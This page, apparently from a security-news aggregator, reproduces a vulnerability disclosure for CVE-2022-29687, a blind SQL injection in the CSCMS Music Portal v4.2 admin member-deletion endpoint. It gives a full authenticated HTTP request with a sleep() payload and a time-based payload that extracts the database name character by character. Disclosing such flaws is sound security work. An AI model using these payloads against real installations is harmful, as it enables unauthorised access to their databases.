Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-29687: SQL injection vulnerability exists in Cscms music portal system v4.2 (Discovered by 星海Lab) · Issue #30 · chshcms/cscms

CSCMS Music Portal System v4.2 was discovered to contain a blind SQL injection vulnerability via the id parameter at /admin.php/user/level_del.

CVE
#sql#vulnerability#web#windows#apple#js#java#php#ssh#chrome#webkit

The administrator needs to add a member after logging in. SQL injection vulnerability is generated when deleting the member. The constructed malicious payload is as follows

POST /admin.php/user/level_del HTTP/1.1
Host: cscms.test
Content-Length: 15
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://cscms.test
Referer: http://cscms.test/admin.php/user/level?v=2012
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=6g124miit249dnkv508bnrsshc8ugiss;XDEBUG_SESSION=PHPSTORM
Connection: close

id[]=(sleep(5))

You can see that success makes the server sleep
Construct payload to guess the database

(case(1)when(ascii(substr((select(database()))from(1)for(1)))=99)then(sleep(5))else(1)end)

There is blind SQL injection. Because the database name is "cscms", the string returned by select database() starts with 'C’, substr ((select + database()), 1,1) = ‘C’ is true, and the verification is correct

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907